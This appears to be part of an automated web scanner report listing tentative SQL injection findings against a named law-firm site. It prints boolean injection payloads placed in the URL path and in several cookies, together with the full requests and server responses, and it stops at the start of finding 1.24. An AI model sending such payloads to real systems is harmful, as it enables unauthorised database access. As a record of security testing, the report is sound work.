<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.18. http://www.curtis.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 67004861'%20or%201%3d1--%20 and 67004861'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico67004861'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /favicon.ico67004861'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.19. http://www.curtis.com/favicon.ico [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 11177873'%20or%201%3d1--%20 and 11177873'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.111177873'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:01:02 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.111177873'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.20. http://www.curtis.com/favicon.ico [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 20486949'%20or%201%3d1--%20 and 20486949'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.130314580320486949'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:01:20 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.130314580320486949'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.21. http://www.curtis.com/favicon.ico [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 35245083%20or%201%3d1--%20 and 35245083%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236735245083%20or%201%3d1--%20; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:01:11 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236735245083%20or%201%3d2--%20; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.22. http://www.curtis.com/favicon.ico [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 16393691'%20or%201%3d1--%20 and 16393691'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16393691'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:00:42 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16393691'%20or%201%3d2--%20; CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.23. http://www.curtis.com/favicon.ico [sifrFetch cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 10585096'%20or%201%3d1--%20 and 10585096'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. The two requests produced different responses: the 1=1 payload drew a 302 to / whose Set-Cookie header expires SIFRFETCH, while the 1=2 payload drew a 200 with the normal page. This is the same behaviour as the __utmz finding in 1.22, and the same caveat applies: a request filter keyed on the literal 1=1 would produce an identical pair of responses, so compare both against the unmodified cookie value before treating this as confirmed.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10585096'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:00:31 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10585096'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.24. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

